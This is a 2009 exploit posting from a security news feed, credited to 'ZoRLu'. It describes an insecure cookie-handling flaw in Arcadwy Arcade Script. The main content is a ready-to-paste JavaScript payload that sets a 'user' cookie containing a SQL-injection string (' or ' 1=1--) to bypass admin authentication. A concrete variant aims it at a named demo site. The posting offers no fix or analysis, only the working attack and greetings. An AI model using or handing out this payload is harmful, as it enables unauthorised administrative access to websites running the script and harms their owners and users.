No account yet?
Home » Exploits » Arcadwy Arcade Script (Auth Bypass) Insecure Cookie Handling Vuln
Arcadwy Arcade Script (Auth Bypass) Insecure Cookie Handling Vuln E-mail
Feeds - Exploits
Written by ZoRLu   
Sunday, 29 March 2009 21:42 
[~] Arcadwy Arcade Script (for ByPass) Insecure Cookie Handling Vulnerability 
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 29.03.2009
[~]
[~] Home: yildirimordulari.com / experl.com / z0rlu.blogspot.com /
[~] woltaj.org
[~]
[~] contact: 
 This e-mail address is being protected from spambots. You need JavaScript enabled to view it
 
[~] 
[~] N0T: BasImIz Sagolsun, Muhsin YazIcIoglu Ulkemiz ve 
[~] Ulkumuz icin Buyuk Kayýp Allah Rahmet Eylesin :((
[~]
[~] N0T: Herkes Hecker Olmus :S
[~]
[~] N0T: My New Target Buffer Overflow :) There is a little time xD
[~]
[~] -----------------------------------------------------------

Demo:

http://games.arcadwy.com/

Exploit:

javascript:document.cookie = "user=[admin_id],' or ' 1=1--; path=/";

Exploit for demo:

javascript:document.cookie = "user=1,' or ' 1=1--; path=/";

[~]-----------------------------------------------------------------
[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone
[~]
[~] yildirimordulari.com / experl.com / z0rlu.blogspot.com / woltaj.org
[~]
[~]-----------------------------------------------------------------
 

Security Services by HSC

Contact us

Become partner
Advertise with us
Join our staff